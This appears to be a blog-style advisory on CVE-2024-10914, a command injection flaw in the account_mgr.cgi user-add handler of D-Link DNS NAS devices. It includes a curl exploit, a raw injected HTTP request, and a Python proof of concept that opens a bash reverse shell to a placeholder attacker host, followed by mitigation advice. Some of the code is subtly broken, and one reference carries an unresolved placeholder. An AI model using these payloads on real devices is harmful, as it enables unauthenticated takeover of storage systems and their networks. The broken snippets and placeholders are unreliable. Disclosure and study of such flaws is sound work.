CVE-2024-10914 - Critical OS Command Injection in D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L

A critical security vulnerability, tracked as CVE-2024-10914, has been identified in several D-Link NAS (Network Attached Storage) devices, including DNS-320, DNS-320LW, DNS-325, and DNS-340L, affecting all firmware versions up to 20241028. This vulnerability allows remote attackers to execute arbitrary operating system commands with the privileges of the web server, potentially leading to full device compromise.

This long-form post will break down what the vulnerability is, how it can be exploited, include example code, and guide you to original resources for further study.

Vulnerable Devices: D-Link DNS-320, DNS-320LW, DNS-325, DNS-340L (firmware up to 20241028)

- Vulnerable Function: cgi_user_add in /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

Public Exploit: Yes

- Impact: Full compromise of NAS, unauthenticated code execution, potential pivot to internal networks

These D-Link NAS devices have a CGI script called account_mgr.cgi that handles user accounts.

- When a new user is added via the web interface, it calls cgi_user_add and processes the name field from the POST request.
- The vulnerability lies in how this script handles input: it doesn’t properly sanitize the value of name before passing it to system commands.

This means an attacker who crafts the right request can sneak extra commands into the system, which then gets executed — just like the owner typed them on the device.

Example Exploit

Here’s a simple demonstration using curl to send malicious input. The key is that the name parameter is injected with a command-separator (;) to piggyback another command.

Exploit Code Snippet

curl -k -X POST "http://<device-ip>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add"; \
     -d "name=attacker; touch /tmp/hacked; #" \
     -d "passwd=mysecret" \
     -d "group=users"

Explanation

- name=attacker; touch /tmp/hacked; # — the injected command (touch /tmp/hacked) will create a file if successful.

The device treats everything after the ; as a system command.

Note: Replace <device-ip> with your device’s IP address.

Python PoC

Here’s a basic Python script to achieve the same, with a reverse shell as payload

import requests

TARGET = "http://<device-ip>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add";

# Reverse shell payload (change <attacker-ip> and <port>)
payload = 'eviluser; bash -i >& /dev/tcp/<attacker-ip>/<port> >&1; #'

data = {
    'name': payload,
    'passwd': 'foobar',
    'group': 'users'
}

response = requests.post(TARGET, data=data)
print(response.text)

Why Is This So Dangerous?

- Remote attack: No need to have an account — if the NAS is exposed to the internet, anyone can exploit it.
- Full device takeover: Since commands run as the web server process (often as root), attackers have complete control.
- Lateral movement: NAS devices are often inside trusted networks, making this a stepping stone for deeper attacks.

Attack Requirements

- Access: The attacker needs network access to the NAS’s web interface. This is often possible on internal networks or badly configured devices exposed to the internet.
- High Complexity: The actual commands must be carefully crafted to bypass minimal input validation and avoid breaking the request structure.
- Authentication: In most setups, no prior authentication is required — making it even more dangerous in default or public deployments.

Example Malicious User Creation Request

POST /cgi-bin/account_mgr.cgi?cmd=cgi_user_add HTTP/1.1
Host: <device-ip>
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

name=admin;id>/tmp/rooted;#&passwd=secret&group=users

After sending, if you can see a new file /tmp/rooted containing the device’s UID/GID (id output), you know the exploit succeeded.

Mitigation and Workaround

- Update Firmware: As of now, there may not be a patch for these legacy devices. Confirm on D-Link’s Support Page.
- Restrict Access: Don’t expose the NAS web interface to the internet. Restrict access to trusted hosts and networks.

Network Segmentation: Place your NAS in a separate VLAN or network zone.

- Monitor system logs: Look for unexpected files or processes. For example, files showing up in /tmp or strange user accounts being created.

Here are some resources for further details

- MITRE CVE-2024-10914 Entry
- NVD Listing
- Exploit-DB Entry *[Example, adjust to actual if different]*
- D-Link Official Product Support

Closing Thoughts

CVE-2024-10914 is a serious vulnerability that could allow attackers to remotely seize control of popular D-Link DNS NAS devices. Owners and administrators of these devices should remove public access, update firmware if patches appear, and strongly consider retiring unsupported, end-of-life hardware. If your NAS is visible to the public internet, take it down *immediately* until you’ve secured it.

Need help? Leave questions below, and I’ll guide you further!

Timeline

Published on: 11/06/2024 14:15:05 UTC
Last modified on: 11/24/2024 15:15:06 UTC